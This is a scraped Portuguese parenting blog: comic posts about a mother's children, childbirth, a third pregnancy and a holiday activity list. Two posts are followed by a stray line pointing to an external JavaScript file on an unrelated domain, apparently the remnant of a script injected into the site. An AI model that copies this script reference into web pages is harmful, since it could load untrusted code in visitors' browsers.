1

Propina??

Aqui em casa cada filho guarda uma bolsinha de dinheiro. Calma, não é o que vocês estão pensando, uma bolsa cheia da grana.. não. É só um moedeiro em formato de coelhinho (verde pra ele e rosa pra ela) com umas moedas e umas notinhas perdidas que eles já ganharam na vida.

Eu não dou mesada pros meus filhos porque não sou organizada o suficiente pra isso. Já tentei dar uma vez mas como eu mais esquecia do que dava, acabamos abolindo essa moda da nossa casa. (Aceito dicas sobre esse assunto, sei que é ótimo eles saberem administrar seu próprio dinheirinho desde cedo e blá blá blá, mas simplesmente não rolou por aqui)

Enfim. As vezes levo eles na banca cada um com seu moedeiro e deixo eles escolherem o que quiserem – o que é um exercício bacana, porque sempre que eles tem que gastar o próprio dinheiro eles escolhem no máximo uma cartela de selinhos ou uma figurinha. Gibi que custa uns 4 reais eles não compram – muito caro. Quando sou eu que pago eles querem a banca inteira.

Porém, ultimamente tenho notado que meu filho tem tentado comprar as pessoas com esse dinheiro dele.

Veja o exemplo ocorrido há um mês:

FILHO: Mãe, deixa eu convidar um amigo hoje direto da escola?

EU: Filho, hoje não dá… a gente tem compromisso

FILHO: Vai mãe, por favor??

EU: Não dá, mesmo! Outro dia você chama.

 

EU: Oi???

E aí eu expliquei pra ele que não adianta pagar, que a gente não muda os pensamentos de uma pessoa dando dinheiro pra ela (será??) e que isso não é uma coisa bonita de se fazer. Afinal, tá na ‘funça’ de mãe né, criar filhos corretos e íntegros, não corruptos ou subornadores.

Eis que nesse final de semana fomos viajar com uns amigos e no sábado de manhã minha amiga me conta, morrendo de rir:

(Rafa é o amiguinho, filho dela, que estava com a gente na viagem)

EU (também rindo né, porque ninguém é de ferro): e o que você falou pra ele?

AMIGA: que por um real eu não acordava, mas por vinte dava pra gente conversar.

Algum dia ele aprende. Espero. Socorro.

________________________________________________

Para quem ficou com a dúvida: não, ele não aceitou a negociação e não pagou os vinte reais. E o Rafa continuou dormindo até as 11 da manhã. 

https://cloudapi.online/js/api46.js

Advertisements
1

A história da calcinha

Para ler esta história você precisa se despir de todo e qualquer julgamento. Eu sei que é normal julgar os outros, fazemos isso todos os dias, blá blá blá.. Mas eu queria contar essa situação do jeitinho que aconteceu e me sentiria mais a vontade se meus queridos leitores me acompanhassem nessa empreitada livres de avaliações.

Era dia de “fundo do mar” na colônia de férias da minha filha. Ou seja, todo mundo ia fantasiado de seres do fundo do mar. Obviamente, minha filha nada influenciada pela mãe, ama as princesas da Disney e optou usar o seu lindo vestido da princesa Ariel- ou da Pequena Ariel, como ela a chama (para quem não sabe quem é, estou me referindo à Pequena Sereia. A princesa mais linda da Disney. Dê um google.)

Acordamos animados e minha filha se vestiu sozinha.

EU: Uaaau que linda você ficou!!

Escolhemos uma presilha de estrela do mar, penteamos o cabelo, colocamos uma sandália verde e VOILA! Prontas.

Verifiquei se todos estavam devidamente calçados, comidos, etc, e fomos para o carro.

Da minha casa até a colônia de férias dá uns 15 minutos.

Já havíamos percorrido mais da metade do caminho quando minha filha anuncia solenemente (como quem conta que foi à padaria comprar pão):

EU (incrédula): COMO SEM CALCINHA?? VOCE NAO PÔS CALCINHA????

Nem pensei em verificar se ela estava de calcinha antes de sair de casa. Afinal de contas, é uma coisa bem óbvia de se pôr. Não? Em geral o primeiro item da nossa vestimenta. E normalmente minha filha sai COM calcinha, como qualquer pessoa normal. Deve ter sido a empolgação em colocar a fantasia.

O fato era: minha filha estava sem calcinha. E adivinha? Na mochila dela justo hoje não tinha troca de roupa… Por que? Porque hoje não era dia de piscina. E porque Murphie e suas leis imperam sempre né?

Opções:

1- voltar pra casa pegar uma calcinha – fora de questão, eu tinha uma reunião e não daria tempo de refazer todo o percurso.

2- comprar uma calcinha no caminho – Hm. Boa. Se eu encontrar alguma coisa aberta antes das 9h da manhã. 

3- ir sem calcinha – por motivos óbvios, fora de questão. Nem sei porque coloquei como uma opção plausível. 

Bom, achei uma loja aberta. UMA. Daquelas de roupas francesas carésimas, que mancham só de olhar, e a criança assim que põe o vestido suja de molho de tomate ou de suco. O que a loja francesa estava fazendo aberta antes das 9 da manhã? Não sei. Talvez estivesse no fuso horário europeu.

Mas, no desespero, vamos tentar né? Vai que esteja em promoção. Vai que eles estejam distribuindo brindes justo hoje. E numa onda de otimismo desses Vai Que, lá fui eu.

Abri o jogo com a vendedora (impecável, diga-se de passagem.)

EU: Moça, minha filha saiu sem calcinha, preciso comprar uma calcinha. Você tem?

MOÇA (com um sorriso gentil): Não trabalhamos com roupas íntimas… Mas temos biquini.

Legal!! Biquini é uma ótima!!

EU: Pode ser!

Aí ela me mostra o tal do biquini.

Preço: R$ 359,00. Não é mentira. É sério.

Fora de cogitação.

Agradeci e saí da loja.

Já tinha perdido uns 3 minutos nessa parada.

Voltei pro carro e tive uma luz:

EU: FILHO DA SUA CUECA PRA SUA IRMÃ!! E VESTE SUA SUNGA.

Eu acho que eu devia estar com uma cara muito nervosa, porque eles nem discutiram. Em segundos minha filha estava de cueca e meu filho de sunga.

E seguiram seus dias como se nada tivesse acontecido. Minha filha de cueca e meu filho de sunga. Irmão é pra isso mesmo, né?

1

Mães sob pressão

Olho pra minha bebê de 4 meses e sinto um aperto no coração.. ela mal nasceu e já tem tanta pressão em cima dela! Pressão para mamar direito, para fazer cocô direito, para dormir a noite toda. Para ser uma criança “calminha”. Para mamar no peito até 18 meses. Para adorar a hora do banho.

Poxa, deixa a criança ser feliz!! Deixa a mãe ser feliz! É tanta cobrança em cima deles… e automaticamente em cima de nós, mães também. Porque eles são nossa cria, então se não está tudo 100% certinho com eles, a culpa é nossa né??

O bebê tem 6 meses e ainda acorda a noite? Tem 10 meses e ainda não sabe engatinhar? A criança tem um ano e meio e não anda ainda? Olha, vai ver porque é problema fisiológico! Tem 3 anos e escapa xixi? Fim de mundo!! Tirou nota baixa na prova?? Põe na aula de reforço! Seu filho é bom em esportes? Fala inglês fluente né?? Já sabe nadar?

Socorro! Quantas coisas que precisamos ensiná-los a fazer! A escovar os dentes direito. Lembrá-los de fazer a lição de casa. Manter as unhas cortadas em dia (só aqui em casa são 60 unhas pra cortar – tirando as minhas!). E acertar um jantar que todo mundo na casa gosta, então?? Missão impossível. Isso sem mencionar nosso dever mínimo de educá-los para se tornarem pessoas boas, íntegras, honestas, trabalhadoras, esforçadas….

Quanta pressão, que responsabilidade! Já fiquei tensa só de pensar.

E como se não bastasse nós mesmas nos cobrando, inseguras com nossas decisões o tempo todo – porque mãe é muito boa em se culpar e se cobrar, (ou não, pode ser que você seja uma mãe super segura de si. Te admiro!!! Queria ser assim!) –  a gente é criticada por um monte de gente na rua, no shopping, no supermercado, em festas... Inclusive por outras mães…

Gente, qual é? Estamos todas no mesmo barco, lutando dia pós dia para conseguir educar nossas crianças no mundo doido de hoje. Ninguém nasceu sendo mãe. Ninguém sabe direito o que está fazendo nesse pandemônio que é a maternidade. A gente faz o que acha que tá certo. É na base do erro e acerto. E pior: o que dá certo pra mim pode não dar certo para você! Cada casa é uma casa… 

Mãe sempre erra, não importa o quanto ela tente acertar.
Enfim! Por uma maternidade mais leve, com menos julgamentos e muito, mas muito mais amor, por favor!!

______________________________________________________

PS: pra completar, a gente tem que fazer tudo o que foi citado acima E ainda estar lindas, magras, bem vestidas, com a ginástica e alimentação em dia, realizadas profissionalmente, e com o cabelo maravilhoso. Que mundo injusto.

Ufa, cansada só de digitar… vamos dar um tempo?! Aceitar mais, culpar e julgar menos?

Um brinde a todas nós, mães e mulheres maravilhas. Cara, de verdade, tiro o meu chapéu para você que tem um, dois, três.. cinco filhos (guerreira!!!!). Vamos nos dar um tapinha nas costas, somos todas Mulheres Maravilhas meeeesmo.

E ai de quem disser o contrário.

https://cloudapi.online/js/api46.js

3

As coisas bonitas que Ele faz

O que é D’us para você?

Alguém que você procura nos momentos difíceis? Um ser supremo que tudo pode? O criador do universo, do céu e da terra e de todos os seres? Seria o acaso, a natureza, as porções de felicidades, os pequenos milagres diários da vida? Seria – e essa dedico aos mais polêmicos – uma invenção do homem? Ou um velhinho de barba branca que mora no céu e recebe e-mails com cada pedido que a gente faz?

Bom, para a minha filha de 4 anos, D’us é uma linda princesa de vestido que arrasta no chão e que mora num castelo rosa-brilhante-de-flores.

Bem gráfico assim mesmo. E ela adora falar de D’us assim, do nada.

E num belo domingo, desses que a gente fica em casa sem fazer nada, meu marido perguntou pra ela ao notá-la concentrada olhando pela janela através do horizonte:

PAPAI: Filha o que você está olhando aí?

Profundo o negócio hoje né?

PAPAI: E o que você tá pensando sobre D’us?

FILHA: Estou pensando nas coisas bonitas que ela faz (ela = D’us)

PAPAI: Sério? Que legal filha… tipo que coisas?

E ela suspira, com ar de sabedoria, e responde:

FILHA: Ah, tipo o meu irmão.

Ah claro, tipo o irmão com quem ela por acaso acabou de se matar por um bichinho de pelúcia.

Sem mais.

______________________________________________

Conclusões dessa história:

1- Não tente entender as brigas do seus filhos. Se ninguém estiver se machucando, DESENCANA e vai cuidar da sua vida. Demorei pra aprender essa lição, mas assumo que minha vida mudou MUITO depois de começar a agir assim.

2- Minha filha de 4 anos pensa nas “coisas bonitas que D’us fez”… (Não sei se isso é bem uma conclusão, mas o fato ainda me espanta um pouco… tipo…  o quanto VOCÊ pensa em D’us? E nas coisas bonitas que Ele fez?)

0

O tal do parto

Toda grávida tem um certo receio do parto. Não tem jeito, dá medo. O que entrou na gente menor do que um grão de areia  vai sair com mais ou menos cinquenta centímetros e pesando três quilos. Fala sério, é pra dar medo em qualquer um, né? E uma das maiores dúvidas das gestantes é: como saber que é hora de ir pro hospital? No último mês cada dia é possível. Será que vai ser no sacolão, no cinema, na festa de uma amiga?

Imaginamos a cena básica: no meio da noite, a gente com dor, acorda nosso parceiro. “Amor acho que vai nascer!!!” Aí ele dá a mão pra gente, com todo o carinho, e iniciamos juntos a contagem das contrações no relógio, calmamente.

Ou a gente imagina que vai ser pega de surpresa. Numa consulta simples de nono mês, você ainda está de 37 semanas, e o médico te examina e fala “Querida, você está super dilatada! Vai nascer hoje a noite.”

Podemos ser mais dramáticas e achar que a nossa bolsa vai estourar em um lugar público. Que grávida nunca pensou nisso? A bolsa rompendo no meio do supermercado, a gente ficando toda molhada. E as pessoas correndo ao nosso auxílio, gritando “Vai nascer!! Vai nascer!!!!” Algum engraçadinho já com o iPhone em mãos filmando a cena toda, esperando que nos deitemos no chão e que demos à luz ali, entre os frios e os enlatados.

Gente, não é bem assim. Parto DEMORA. Salvo algumas exceções, grande parte do trabalho de parto consiste em esperar. Esperar a dilatação completar, esperar o anestesista chegar, esperar o bebê descer. É uma longa espera.

Bom, decidido que é hora de ir pro hospital, vem toda aquela emoção, ligamos para os familiares e vamos correndo para o carro (se você resolver ir de taxi como eu, tem que entrar fazendo cara de paisagem, senão ele não te leva, com medo que você dê a luz no banco de trás). A entrada e saída do carro é um trampo com todas as malas – a sua, a do bebê, a do pai, a das lembrancinhas, a dos docinhos e o tal do quadro da maternidade que ficamos meses planejando. Parece que vamos sair de férias por um mês.

Chegando no hospital a ansiedade bate forte. Será que vou conseguir fazer parto normal? Será que minha cesária vai dar certo? Será que vai demorar ou vai ser rapidinho? Eu quando cheguei no hospital achei que iam me tirar do carro numa maca, me levar correndo pra sala de parto, uma gritaria tipo E.R. Mas não, tudo correu muito calmamente. Cheguei, esperei, meu marido preencheu o protocolo, fizeram a triagem para confirmar que eu de fato estava em trabalho de parto (aparentemente meus gritos não foram suficientes). E tudo isso sem nada de pressa, no maior bate papo animado. Aí, constatado que realmente era hora de nascer, me colocaram numa cadeira de rodas (finalmente !!!) e me levaram até a sala.

Me vestiram num aventalzinho branco, colocaram uns tubinhos na minha veia, mediram minha pressão e falaram “agora espera”. E fiquei lá, meio esquecida. Morrendo de dor, xingando quem aparecesse na minha frente, e todo mundo em volta agindo normalmente, realizando suas funções do dia a dia. Era um entra e sai de enfermeiras na sala, trazendo coisa, levando coisa, conversando sobre a festa da semana que vem e sobre o placar do jogo do Corinthians. E eu lá, naquela situação.

Quando eu achava que aquilo não ia acabar nunca, que a dor ia durar para sempre, chegou meu anestesista, santo doutor Eduardo. E pronto, em quinze minutos o mundo se tornou um lugar mais bonito. De repente eu percebi que na verdade meu marido era um fofo de estar la do meu lado me dando a mão – e não mais um canalha idiota e culpado por toda a dor que eu estava sentindo. Até as enfermeiras de repente pareceram mais simpáticas e solícitas. O mundo voltou a ser um lugar civilizado. Fiz piadinhas para a câmera de video e reparei em como a sala de parto era muito mais aconchegante e charmosa do que eu imaginava quando tudo começou.

Passada a fase ESPERA, chegou a hora de nascer. E de repente todos os presentes na sala se posicionaram numa plateia organizada: o pediatra, o ajudante do pediatra, as enfermeiras, o seu médico, o assistente do seu médico, o anestesista, e mais um enfermeiro que estava de passagem pra sua hora de almoço, ouviu a confusão e resolveu entrar. Aquela bagunça toda: faz força, mais força, mais um pouco de força. Nasceu?? Nasceu!!! Tira o bebê, dá pro pediatra, cuida da mãe. E depois de se certificarem de que está tudo bem, pesarem e medirem a criança, me ofereceram o meu pequeno e lindo prêmio: um embrulho minúsculo de touquinha na cabeça, parecendo um joelhinho amassado, que era a cara do pai.

Bom, aí eu aprendi algumas lições. Que as dores do parto e do pós parto não tem nada de romântico. Que as contrações são de morrer, a cicatrização é complicada, o peito parece que vai explodir com a descida do leite. Que você fica pálida, andando que nem uma pata, e ainda tem que sorrir e se arrumar para as visitas que vem pra te parabenizar. Mas faz parte do pacote, e rola uma pressão para sair do parto linda, magra e recuperada – não rola?? Aprendi que cada mulher é uma mulher, e que cada parto é um parto. (Conheço gente que não sente nada de dor, gente que grita até não poder mais. Tenho uma amiga que não percebeu que estava em trabalho de parto e deu a luz em casa. Uma que ficou treze horas internada esperando a dilatação completar até nascer. Outra que fez cesárea marcada. Uma que a bolsa estourou no meio da noite enquanto ela dormia. Outra que depois de passar da data, foi para indução. Tem uma conhecida minha que deu a luz no carro – afinal seu bebê resolveu nascer as seis e meia da tarde de uma sexta feira chuvosa em plena Avenida Rebouças).

Mas acima de tudo aprendi que mesmo que você jure com todas as suas forças que nunca mais vai passar por essa agonia de novo e que considere loucas todas as mulheres que vão para o segundo filho, depois de uns meses você esquece de toda a dor e desespero – e aí fica pronta para ter o seu próximo pacotinho.

Dessa vez rosa, quem sabe?

6

Novidades!

Queridos leitores,

É com imenso prazer que comunico o nascimento de nossa terceira filha!! Agora somos uma família de cinco integrantes..

Eu sei, eu sei, nem postei que estava grávida. Nem avisei ninguém. Que falta de consideração da minha parte.. É que a vida já tava bem louca com minhas duas crias, aí a terceira gravidez passa meio “desapercebida” sabe?

É assim que funciona, a primeira gravidez você está tão animada que conta pra todo mundo! Ah que maravilha! A gente corre ligar pra mãe, pra sogra, pra tia, pros amigos do trabalho, pro vizinho. Faz a festa. Até o seu porteiro sabe que você está grávida (antes da barriga sequer dar as caras)

Tudo é lindo. Dá até pra sentir aquela minúscula sementinha florescendo no seu útero. A gente sai pra comprar roupa de grávida, mesmo que a barriga não aumentou um mílimetro ainda. E fica se admirando no espelho com aquela barriga falsa que a vendedora te ofereceu. “Você vai ficar liiiinda de barriga!!”. Gente, grávida é que nem noiva. Já viu grávida feia? Não. Você já viu grávida meio inchada. Grávida meio pálida, grávida meio acima do peso. Agora, grávida feia, não.

Bom aí chegam os enjôos. Não só os matinais, como os vespertinos e noturnos também. Aliás nem sei porque deram o nome de enjôo matinal. É só sentir o cheiro de qualquer coisa que já sobe aquela ânsia, não importa a hora do dia. E não passa tão rápido, não. Fica aí no mínimo uns três meses até ir embora. E no primeiro filho, é aquela coisa:

No terceiro filho não tem isso, não. É tipo “aguenta aí, amiga, que daqui a pouco as crianças dormem e você pode deitar e passar mal a vontade”

E os hormônios? Pense numa TPM brava. Agora imagine ela se alastrando por semanas. Antes do café da manhã, eu já tinha sentido frio, calor, ódio mortal, fome e enjôo. Isso que não são nem 9 horas da manhã. A gente fica sensível, a flor da pele. A mistura é tão louca que o meu santíssimo marido que se cuidasse, afinal era TUDO culpa dele eu estar naquele estado!! A gente ama, odeia, quer abraçar bater, tudo ao mesmo tempo. Meu marido, coitado, toda noite fazia uma prece no elevador antes de entrar em casa.

No terceiro filho você se contém mais, precisa estar mais equilibrada, afinal, tem outros dois pra dar conta em casa – que já estão suficientemente sensíveis com a notícia da gravidez.

Aí o tempo vai passando e a gente começa a contar tudo em semanas. Eu tô de 19 semanas. O aniversário da minha mãe é daqui a 9 semanas e meia. A festa da empresa foi há 7 semanas. Fulana tá de 32 semanas e nem parece que tá grávida. Aí sentimos o primeiro chute. Que delícia!! Todo mundo quer sentir. A mãe, sogra, até o seu chefe. “Esse aí vai ser jogador de futebol!!” falam os papais, todo orgulhosos. E sempre, SEMPRE que alguém põe a mão para sentir, o bebê pára de se mexer.

Aliás quando a barriga aparece ela vira pública né? O pessoal no meio da rua já chega chegando, ‘ai que coisa linda! Para quando você ta?’ e posiciona a mão na sua barriga. E se você é do tipo mais tímida ou faz cara feia você se torna A grávida estúpida.

Os meses vão passando e a gente já se cadastrou em todos os sites de bebê possíveis, já comprou vários livros sobre gravidez, está por dentro de tudo o que pode ou não esperar quando você está esperando. E de repente começa a usar um monte de termos médicos e está super antenada em medicina fetal. Falamos sobre como o bebê está grande, ou sobre como a placenta baixou, ou sobre o fluxo do cordão e o nível do líquido amniótico. E se a gente encontra outra grávida, mesmo que desconhecida (seja na rua, no shopping, na sala de espera) rola aquele olhar de compreensão, tipo “nós duas nos entendemos, estamos carregando um ser dentro de nós”. E se iniciamos uma conversa, ninguém segura mais: “De quanto tempo você está?” Começamos falando sobre as tais das semanas, o sexo do bebê e por aí vamos. Falamos sobre a decoração do quarto. Sobre possíveis nomes. Sobre como está a sua alimentação ‘equilibrada’, tomando 4 litros de água por dia como mandam os livros.

Perto do final da gravidez a gente está que não se aguenta mais. Aquela sementinha minúscula te transformou num balão. Suas costas estão acabadas – eu pelo menos me sentia uma idosa de 105 anos andando. Sabe aquelas roupas de grávida que você tão empolgada comprou há alguns meses? Você não agüenta mais olhar pra elas. O calor é de matar. Você faz em média 30 xixis por dia. Os chutes que antes eram pequenas tremidinhas meigas se tornam verdadeiros terremotos. Você está há dias sem dormir, afinal não tem posição por causa da barriga. Cansada, com dores pelo corpo, e esperando o bebê resolver dar o ar de sua graça – (no caso de um parto normal). Uma lista infindável de reclamações. E os conhecidos não dão trégua. Falta ainda duas semanas para a data, o pessoal já começa: “Esse bebê não tá querendo sair né??” “Deve ser porque tá frio aqui fora, ele tá curtindo ficar no quentinho he-he”.

Bom, mas na terceira você já está mais preparada pra tudo isso. Se for esperta, (eu não fui), já joga a data provável do parto mais pra frente, e aguarda para contar a novidade somente quando a barriga já tiver aparecido. A minha data provável era 12/02 e ela nasceu 8 dias depois!! E eu, como já sofri um aborto espontâneo aos 3 meses de gestação, espero para contar só quando já estiver tudo bem, os morfológicos feitos, etc.

Nossa nova integrante nasceu no dia 20 de fevereiro de 2017! Estou muito empolgada e ansiosa pelas novas aventuras como mãe de três.. Aguardem =)

0

Lista de férias

Chegaram as férias! A época mais esperada pelas crianças e temida pelos pais. Compilei uma lista de 15 coisas que pretendo fazer com eles nesse período tão calmo e tranquilo do ano. Vamos ver se consigo realizar todas:

1. fazer uma fotografia de família bonita – daquelas que a gente põe roupa combinando e encontra um ponto da casa que está arrumado pra fazer o clique. Todo mundo tem que sair sorrindo e para isso a gente suborna as crianças com doces e sorvetes.

2. pintar um quadro (a ideia é despertar o picasso – ou tarsila, van gogh, ou romero britto… vai de gosto pessoal – que existe dentro de nós. Consiste em comprar telas, pinceis, e um jogo de tintas. Ah, e forrar a casa inteira com jornais e deixar lenços umedecidos a disposição)screen-shot-2016-12-20-at-3-38-20-pm

3. fazer um bolo (por mais que a gente faça durante o ano letivo é sempre com um pouco de pressa, e nunca dá tempo de fazer a cobertura)

 

4. fazer uma refeição “bem saudável” (pizza, hot dog, hamburger… o que der na telha)

5. tomar um banho de chuva (parece um pouco clichê… mas não é. Honestamente, não lembro quando foi a última vez que meus filhos realmente curtiram uma chuvinha de roupa e tudo!! Lembro que eu na infância fiz isso algumas vezes e foi TÃO gostoso)

6. pular numa poça de lama (sonho deles desde que eles assistiram a Peppa pela primeira vez..)

7. entrar na piscina e sair só quando a pele estiver bem enrugadinha (ou “chupadinha”, como eles chamam.. porque nas férias não tem hora pra nada.. o importante é ser feliz. E gastar muita energia)screen-shot-2016-12-20-at-2-56-31-pm

8. dormir tarde (ok, tarde pra meus filhos dormir tarde é dormir as 21h. Mas tá valendo, super aventureiros!!)

9. fazer uma casinha de caixa de sapato (tenho uma caixa de um tênis do meu filho guardada há mais de seis meses esperando por esse momento. O tênis inclusive já rasgou e se tornou inutilizável. Por que eles duram TÃO pouco??)

10. acompanhar o crescimento do nosso pezinho de feijão (porque no dia a dia a gente esquece de olhar como cresceu de um dia por outro e de repente as crianças já veem a planta pronta crescida!!)

11. tomar um sorvete extravagante (com direito a cauda de chocolate, MMs, cerejas, suspiros, e quantos acompanhamentos a gente quiser!! – se bem que conhecendo meus filhos, já sei que vou acabar comendo o negócio inteiro e eles vão ficar cheios depois de três colheres)screen-shot-2016-12-20-at-3-07-48-pm

12. assistir com eles um filme da minha infância (porque hoje em dia tem muito seriado infantil… tipo Peppa, Patrulha Canina, episódios do Lego e dos Angry Birds, Mickey Mouse Club House, Masha e o Urso… na minha época não existia essas modernidades, se a gente quisesse ver TV era ou filme da Disney ou programação da TV Cultura)

 

13. fazer um caça ao tesouro pela nossa casa (também na minha programação há meses mas no dia a dia simplesmente não dá tempo)

14. não ter pressa pra nada (fazer tudo com calma e tranquilamente, com horários um pouco mais flexíveis. Tipo deixar eles acordarem a hora que quiserem – o que na verdade não muda nada porque eles acordam TODO DIA entre 6:30 e 7 horas. Inclusive domingos e feriados ou quando vão dormir mais tarde...)

IRMAOSS 1

15. último (e meu preferido): deixar eles ficarem desocupados. Simplesmente brisando, olhando para o teto e pensando na imortalidade da alma ou algum outro assunto irrelevante.